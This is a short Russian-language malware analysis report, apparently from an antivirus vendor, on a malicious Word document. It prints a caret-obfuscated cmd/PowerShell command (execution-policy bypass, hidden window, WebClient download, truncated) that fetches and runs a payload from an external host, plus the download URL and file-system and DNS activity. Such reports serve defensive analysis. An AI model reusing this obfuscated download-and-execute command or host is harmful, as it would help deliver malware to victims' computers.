Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://fortycooola.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^owe^r^She^lL.eXe -E^x^EC^UTIONPOLIcY by^PAs^S^ -^No^pr^OF^I^L^e ^-w^iN^Dowsty^le^ hid^d^En (N^eW^-obje^C^t SY^sTEm.^n^ET.WebcLie^Nt)^.D^OWNl^oadf^I^L^e('http://fortycoool...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\word\<Имя файла>.doc
Удаляет следующие файлы
- %TEMP%\word\<Имя файла>.doc
Сетевая активность
UDP
- DNS ASK fo###cooola.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^owe^r^She^lL.eXe -E^x^EC^UTIONPOLIcY by^PAs^S^ -^No^pr^OF^I^L^e ^-w^iN^Dowsty^le^ hid^d^En (N^eW^-obje^C^t SY^sTEm.^n^ET.WebcLie^Nt)^.D^OWNl^oadf^I^L^e('http://fortycoool...' (со скрытым окном)
